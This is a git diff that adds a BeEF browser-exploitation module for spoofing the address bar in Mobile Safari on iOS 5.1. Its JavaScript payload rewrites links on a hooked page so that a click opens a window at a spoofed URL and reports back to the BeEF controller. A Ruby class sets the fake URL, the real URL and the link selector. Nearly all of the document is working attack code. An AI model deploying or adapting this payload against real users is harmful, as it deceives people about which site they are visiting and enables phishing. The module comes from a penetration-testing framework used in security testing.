diff --git a/modules/browser/mobilesafari_address_spoofing/command.js b/modules/browser/mobilesafari_address_spoofing/command.js new file mode 100644 index 000000000..7a0274480 --- /dev/null +++ b/modules/browser/mobilesafari_address_spoofing/command.js @@ -0,0 +1,22 @@ +var somethingsomething = function() { + var fake_url = "<%= @fake_url %>"; + var real_url = "<%= @real_url %>"; + + var newWindow = window.open(fake_url,'newWindow<%= @command_id %>','width=200,height=100,location=yes'); + newWindow.document.write(''); + newWindow.focus(); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Spoofed link clicked'); +} + +beef.execute(function() { + + $j('<%= @domselectah %>').each(function() { + $j(this).attr('href','#').click(function() { + somethingsomething(); + return true; + }); + }); + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=All links rewritten'); + +}); \ No newline at end of file diff --git a/modules/browser/mobilesafari_address_spoofing/config.yaml b/modules/browser/mobilesafari_address_spoofing/config.yaml new file mode 100644 index 000000000..163bf3056 --- /dev/null +++ b/modules/browser/mobilesafari_address_spoofing/config.yaml @@ -0,0 +1,30 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + mobilesafari_address_spoofing: + enable: true + category: ["Browser","Hooked Domain"] + name: "iOS Address Bar Spoofing" + description: "Mobile Safari iOS 5.1 Address Bar Spoofing. This is fixed in latest version of Mobile Safari (the URL turns 'blank')" + authors: ["bcoles","xntrik","majorsecurity.net"] + target: + working: + S: + os: ["iPhone"] + not_working: + ALL: + os: ["All"] diff --git a/modules/browser/mobilesafari_address_spoofing/module.rb b/modules/browser/mobilesafari_address_spoofing/module.rb new file mode 100644 index 000000000..b5f95a712 --- /dev/null +++ b/modules/browser/mobilesafari_address_spoofing/module.rb @@ -0,0 +1,34 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Mobilesafari_address_spoofing < BeEF::Core::Command + + def self.options + return [ + {'name' => 'fake_url', 'ui_label' => 'Fake URL', 'type' => 'text', 'value' =>'http://en.wikipedia.org/wiki/Beef'}, + {'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'http://www.beefproject.com'}, + {'name' => 'domselectah', 'ui_label' => 'jQuery Selector for Link rewriting. \'a\' will overwrite all links', 'type' => 'text', 'value' => 'a'} + ] + end + + def post_execute + content = {} + content['results'] = @datastore['results'] + content['query'] = @datastore['query'] + save content + end + +end +